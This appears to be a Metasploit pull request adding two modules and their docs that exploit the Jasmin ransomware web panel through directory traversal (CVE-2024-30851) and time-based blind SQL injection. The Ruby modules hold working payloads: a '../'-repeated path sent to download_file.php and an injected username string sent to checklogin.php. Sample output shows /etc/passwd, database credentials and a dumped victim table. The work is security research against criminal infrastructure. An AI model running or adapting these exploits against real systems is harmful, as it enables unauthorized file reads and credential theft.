### PR TITLE
jasmin ransomware sqli and dir travers (CVE-2024-30851)

### DIFF
--- a/documentation/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.md
+++ b/documentation/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.md
@@ -1,0 +1,139 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability
+within the download functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_dir_traversal`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get the content of a file if it exists.
+
+## Options
+
+### FILE
+
+File to retrieve. `etc/passwd` is the default, but
+`var/www/html/database/db_conection.php` contains the
+database credentials.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_dir_traversal
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+pollinate:x:105:1::/var/cache/pollinate:/bin/false
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+syslog:x:107:113::/home/syslog:/usr/sbin/nologin
+uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
+tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
+landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
+fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
+arangodb:x:998:999:ArangoDB Application User:/usr/share/arangodb3:/bin/false
+dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+dovecot:x:116:122:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
+dovenull:x:117:123:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
+rtkit:x:118:124:RealtimeKit,,,:/proc:/usr/sbin/nologin
+kernoops:x:119:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+cups-pk-helper:x:120:125:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+systemd-oom:x:121:128:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+whoopsie:x:122:129::/nonexistent:/bin/false
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+avahi-autoipd:x:124:131:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+avahi:x:125:132:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+nm-openvpn:x:126:133:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:127:135::/var/lib/saned:/usr/sbin/nologin
+colord:x:129:136:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+sssd:x:130:137:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+pulse:x:131:138:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+speech-dispatcher:x:132:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+gnome-initial-setup:x:133:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:134:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:136:143:MySQL Server,,,:/nonexistent:/bin/false
+
+[+] Saved file to: /root/.msf4/loot/20240415125844_default_127.0.0.1_jasmin.webpanel._670418.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set FILE var/www/html/data
+base/db_conection.php
+FILE => var/www/html/database/db_conection.php
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] <?php
+$dbcon=mysqli_connect("localhost","jasminadmin","123456");
+
+mysqli_select_db($dbcon,"jasmin_db");
+
+?>
+
+[+] Saved file to: /root/.msf4/loot/20240415125905_default_127.0.0.1_jasmin.webpanel._177654.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) >
+```
+

--- a/documentation/modules/auxiliary/gather/jasmin_ransomware_sqli.md
+++ b/documentation/modules/auxiliary/gather/jasmin_ransomware_sqli.md
@@ -83,18 +83,13 @@ Logins
 Victims
 =======
 
- machine_name    computer_user  ip              systemid         password
- ------------    -------------  --              --------         --------
- Bollywood       Salman Khan    47.247.223.177  df545f454f5d4f5  M9M99EvNpZVOWpy9
-                                                d4af5            Q8sZLHEP
- DESKTOP-37Q74Q  cyberstair     47.247.223.177  96457DF79A87C7C  xAS4NinH/HQKNJws
- H                                              0008A7BE7        NtTWN5yD
- FiFa            Leone Messi    47.247.223.177  cfhsfkdjkfvdd45  JDNAaz6e3oyM8cN+
-                                                4s5g4            AGFdMl/5
- Indian Cricket  Virat Kohli    47.247.223.177  SDGFs4F4S4FD4F4  3tIHrYJqqTSBpw4l
-                                                545fs            gMMck1GD
- White House     Donald Trump   47.247.223.177  fgighefesdgvrd5  RJtCd9QqiCfBaSU0
-                                                g45rd4h          zQf84dvd
+ machine_name     computer_user  ip              systemid                  password
+ ------------     -------------  --              --------                  --------
+ Bollywood        Salman Khan    47.247.223.177  df545f454f5d4f5d4af5      M9M99EvNpZVOWpy9Q8sZLHEP
+ DESKTOP-37Q74QH  cyberstair     47.247.223.177  96457DF79A87C7C0008A7BE7  xAS4NinH/HQKNJwsNtTWN5yD
+ FiFa             Leone Messi    47.247.223.177  cfhsfkdjkfvdd454s5g4      JDNAaz6e3oyM8cN+AGFdMl/5
+ Indian Cricket   Virat Kohli    47.247.223.177  SDGFs4F4S4FD4F4545fs      3tIHrYJqqTSBpw4lgMMck1GD
+ White House      Donald Trump   47.247.223.177  fgighefesdgvrd5g45rd4h    RJtCd9QqiCfBaSU0zQf84dvd
 
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed

--- a/documentation/modules/auxiliary/gather/jasmin_ransomware_sqli.md
+++ b/documentation/modules/auxiliary/gather/jasmin_ransomware_sqli.md
@@ -1,0 +1,102 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability
+within the login functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+Retrieving the victim's data may take a long amount of time. It is much quicker to
+get the logins, then just login to the site.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_sqli`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should contents from the SQL Database.
+
+## Options
+
+### VICTIMS
+
+Pull data from the Victim's table. Defaults to `false`
+
+### VICTIMLIMIT
+
+Number of rows from the victim table to pull. Defaults to `nil` which pulls all rows.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_sqli
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set victims true
+victims => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > run
+
+[*] Dumping login table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(admin,''),ifnull(creds,'')) as binary)) from master)
+[*] {SQLi} Time-based injection: expecting output of length 15
+[+] Dumped table contents:
+Logins
+======
+
+ admin     creds
+ -----     -----
+ siddhant  123456
+
+[*] Dumping victim table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(machine_name,''),ifnull(computer_user,''),ifnull(ip,''),ifnull(systemid,''),ifnull(password,'')) as binary)) from victims)
+[*] {SQLi} Time-based injection: expecting output of length 428
+[+] Dumped table contents:
+Victims
+=======
+
+ machine_name    computer_user  ip              systemid         password
+ ------------    -------------  --              --------         --------
+ Bollywood       Salman Khan    47.247.223.177  df545f454f5d4f5  M9M99EvNpZVOWpy9
+                                                d4af5            Q8sZLHEP
+ DESKTOP-37Q74Q  cyberstair     47.247.223.177  96457DF79A87C7C  xAS4NinH/HQKNJws
+ H                                              0008A7BE7        NtTWN5yD
+ FiFa            Leone Messi    47.247.223.177  cfhsfkdjkfvdd45  JDNAaz6e3oyM8cN+
+                                                4s5g4            AGFdMl/5
+ Indian Cricket  Virat Kohli    47.247.223.177  SDGFs4F4S4FD4F4  3tIHrYJqqTSBpw4l
+                                                545fs            gMMck1GD
+ White House     Donald Trump   47.247.223.177  fgighefesdgvrd5  RJtCd9QqiCfBaSU0
+                                                g45rd4h          zQf84dvd
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+

--- a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jasmin Ransomware Web Server Unauthenticated Directory Traversal',
+        'Description' => %q{
+          The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability
+          within the download functionality. As of April 15, 2024 this was still unpatched, so all
+          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+        },
+        'References' => [
+          ['CVE', '2024-30851'],
+          ['URL', 'https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc'],
+          ['URL', 'https://github.com/codesiddhant/Jasmin-Ransomware']
+        ],
+        'Author' => [
+          'chebuya', # discovery, PoC
+          'h00die', # metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2023-04-08',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The relative URI of the Jasmin Ransomware webserver', '/']),
+        OptInt.new('DEPTH', [true, 'Depth of directory traversal to root ', 9]),
+        OptString.new('FILE', [true, 'File to retrieve', 'etc/passwd'])
+        # /var/www/html/database/db_conection.php another good file to pull
+      ]
+    )
+  end
+
+  def run_host(ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? '<title>Jasmin Dashboard</title>'
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'download_file.php'),
+      'vars_get' => {
+        'file' => "#{'../' * datastore['DEPTH']}#{datastore['FILE']}"
+      }
+    )
+    fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty?
+
+    print_good(res.body)
+    # store loot
+    path = store_loot(
+      'jasmin.webpanel.dir.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      File.basename(datastore['FILE'])
+    )
+    print_good('Saved file to: ' + path)
+  end
+end

--- a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
@@ -4,9 +4,9 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
-  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -54,7 +54,9 @@ class MetasploitModule < Msf::Auxiliary
     return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '<title>Jasmin Dashboard</title>'
+    return Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '<title>Jasmin Dashboard</title>'
+
+    Exploit::CheckCode::Safe("#{peer} - Jasmin login page not found")
   end
 
   def run

--- a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
@@ -4,6 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
 
@@ -65,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary
     )
     fail_with(Failure::Unknown, 'No response from server') if res.nil?
     fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty?
-    fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 302
 
     print_good(res.body)
     # store loot

--- a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
@@ -4,6 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::SQLi
@@ -74,10 +75,8 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::Unreachable, 'Connection failed') unless res
     end
 
-    unless @sqli.test_vulnerable
-      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
-      return
-    end
+    fail_with(Failure::NotVulnerable, "#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.") unless @sqli.test_vulnerable
+
     columns = ['admin', 'creds']
     vprint_status('Dumping login table')
     data = @sqli.dump_table_fields('master', columns, '')

--- a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
@@ -56,7 +56,9 @@ class MetasploitModule < Msf::Auxiliary
     return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '<title>Jasmin Dashboard</title>'
+    return Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '<title>Jasmin Dashboard</title>'
+
+    Exploit::CheckCode::Safe("#{peer} - Jasmin login page not found")
   end
 
   def run

--- a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
@@ -1,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::SQLi
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jasmin Ransomware Web Server Unauthenticated SQL Injection',
+        'Description' => %q{
+          The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability
+          within the login functionality. As of April 15, 2024 this was still unpatched, so all
+          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+          Retrieving the victim's data may take a long amount of time. It is much quicker to
+          get the logins, then just login to the site.
+        },
+        'References' => [
+          ['URL', 'https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc'],
+          ['URL', 'https://github.com/codesiddhant/Jasmin-Ransomware']
+        ],
+        'Author' => [
+          'chebuya', # discovery, PoC
+          'h00die', # metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2023-04-08',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The relative URI of the Jasmin Ransomware webserver', '/']),
+        OptBool.new('VICTIMS', [false, 'Retrieve data on the victims', false]),
+        OptInt.new('VICTIMLIMIT', [false, 'Number of victims data to pull']),
+      ]
+    )
+  end
+
+  def run_host(ip)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? '<title>Jasmin Dashboard</title>'
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      check_char = Rex::Text.rand_text_alpha_lower(5)
+      res = send_request_cgi({
+        'keep_cookies' => true,
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'checklogin.php'),
+        'vars_post' => {
+          'username' => "#{Rex::Text.rand_text_alpha_lower(1)}' AND (SELECT 1 FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha_lower(1)}) AND '#{check_char}'='#{check_char}",
+          'password' => '',
+          'service' => 'login'
+        }
+      })
+      fail_with(Failure::Unreachable, 'Connection failed') unless res
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      return
+    end
+    columns = ['admin', 'creds']
+    vprint_status('Dumping login table')
+    data = @sqli.dump_table_fields('master', columns, '')
+    table = Rex::Text::Table.new('Header' => 'Logins', 'Indent' => 1, 'Columns' => columns)
+    data.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :password,
+        private_data: user[1],
+        service_name: 'Jasmin Webpanel',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good('Dumped table contents:')
+    print_line(table.to_s)
+
+    return unless datastore['VICTIMS']
+
+    vprint_status('Dumping victim table')
+    columns = ['machine_name', 'computer_user', 'ip', 'systemid', 'password']
+    if datastore['VICTIMLIMIT'].nil?
+      data = @sqli.dump_table_fields('victims', columns, '')
+    else
+      data = @sqli.dump_table_fields('victims', columns, '', datastore['VICTIMLIMIT'])
+    end
+    table = Rex::Text::Table.new('Header' => 'Victims', 'Indent' => 1, 'Columns' => columns)
+    data.each do |victim|
+      table << victim
+    end
+    print_good('Dumped table contents:')
+    print_line(table.to_s)
+  end
+end


### PR DESCRIPTION
This PR adds an unauth dir traversal, and a sqli exploit (CVE-2024-30851) against the Jasmin ransomware web panel.

## Verification

1. Install the application
1. Start msfconsole
1. Do: `use auxiliary/gather/jasmin_ransomware_dir_traversal`
1. Do: `set rhosts [ip]`
1. Do: `run`
1. You should get the content of a file if it exists.

1. Install the application
1. Start msfconsole
1. Do: `use auxiliary/gather/jasmin_ransomware_sqli`
1. Do: `set rhosts [IP]`
1. Do: `run`
1. You should contents from the SQL Database.